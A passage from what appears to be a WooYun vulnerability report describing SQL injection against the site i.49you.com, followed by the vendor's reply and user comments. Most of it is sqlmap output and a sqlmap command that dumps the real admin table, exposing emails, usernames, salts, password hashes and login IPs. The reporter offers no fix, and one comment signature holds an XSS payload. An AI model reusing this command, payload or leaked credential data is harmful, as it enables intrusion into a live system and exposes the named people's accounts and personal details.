| category           |
| category_priv      |
| collection_content |
| collection_history |
| collection_node    |
| collection_program |
| content_check      |
| copyfrom           |
| datacall           |
| dbsource           |
| download           |
| download_data      |
| downservers        |
| extend_setting     |
| favorite           |
| game               |
| game_data          |
| hits               |
| ipbanned           |
| keylink            |
| keyword            |
| keyword_data       |
| link               |
| linkage            |
| log                |
| member             |
| member_detail      |
| member_group       |
| member_menu        |
| member_verify      |
| member_vip         |
| menu               |
| message            |
| message_data       |
| message_group      |
| model              |
| model_field        |
| mood               |
| news               |
| news_data          |
| page               |
| pay_account        |
| pay_payment        |
| pay_spend          |
| position_data      |
| poster             |
| poster_201409      |
| poster_201506      |
| poster_space       |
| queue              |
| release_point      |
| search             |
| search_keyword     |
| site               |
| sms_report         |
| special            |
| special_c_data     |
| special_content    |
| sphinx_counter     |
| sqlmapoutput       |
| sso_admin          |
| sso_applications   |
| sso_members        |
| sso_messagequeue   |
| sso_session        |
| sso_settings       |
| tag                |
| template_bak       |
| test_artice        |
| test_artice_data   |
| test_picture       |
| test_picture_data  |
| times              |
| type               |
| urlrule            |
| video              |
| video_content      |
| video_data         |
| video_store        |
| vote_data          |
| vote_option        |
| vote_subject       |
| wap                |
| wap_type           |
| workflow           |
+--------------------+
[15:29:48] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 101 times
[15:29:48] [INFO] fetched data logged to text files under '/root/.sqlmap/output/i.49you.com'
[*] shutting down at 15:29:48


100张表
下一步:
sqlmap -u "http://i.49you.com/news/item/catid/55*/id*/15*.html" -D "i_49you" -T "admin"--dump
进管理员表:
+--------+--------+---------+---------+------------------+---------+-----------+----------+----------------------------------+----------------+---------------+
| roleid | userid | lang | card | email | encrypt | username | realname | password | lastloginip | lastlogintime |
+--------+--------+---------+---------+------------------+---------+-----------+----------+----------------------------------+----------------+---------------+
| 1 | 1 | <blank> | <blank> | tanxz@49app.com | s6SCI6 | admin | <blank> | 6074e9112bb7fe18a8aadb8495f73df7 | 113.99.0.43 | 1431054485 |
| 2 | 2 | <blank> | <blank> | fdsafds@qq.com | v9XvY2 | livebasic | test | 27357894d16487c7bb2e196a4d0f77e8 | 183.131.11.101 | 1411466593 |
| 2 | 3 | <blank> | <blank> | qianhm@49app.com | HSCAPv | meimei | 每每 | f1e0824af35f2380c22b730bfdf36e4c | 183.6.152.58 | 1417662909 |
+--------+--------+---------+---------+------------------+---------+-----------+----------+----------------------------------+----------------+-------

2015-06-28 16:23:02的屏幕截图.png


2015-06-28 16:24:12的屏幕截图.png

最后一步,解密进后台
完工~~~~撤。。。
接下来

修复方案:

我也不清楚,朋友让我搞得。。。。

版权声明:转载请注明来源 ’‘Nome@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-06-29 10:24

厂商回复:

这个已经是比较老的了,暂时解决方案是停止这个网站域名了非常感谢白帽子童鞋 @’‘Nome,技术正在紧急修复中

最新状态:

暂无

漏洞评价:

评论

  1. 2015-06-29 10:44 | ’‘Nome ( 实习白帽子 | Rank:55 漏洞数:19 | 在此感谢 @M4sk @mango @裤裆 @泳少 @5up3r...)

    @疯狗,老大厂商要送礼物?我接受么?@上海49游,送礼物还是?不是就不接受了

  2. 2015-07-01 05:36 | 小龙 ( 普通白帽子 | Rank:1208 漏洞数:316 | 乌云有着这么一群人,在乌云学技术,去某数...)

    @’‘Nome 不接受,@上海49游 他不要就邮给我吧

  3. 2015-07-20 09:33 | DloveJ ( 普通白帽子 | Rank:1107 漏洞数:200 | <a href=javascrip:alert('xss')>s</a> 点...)

    李姐姐的什么神器。?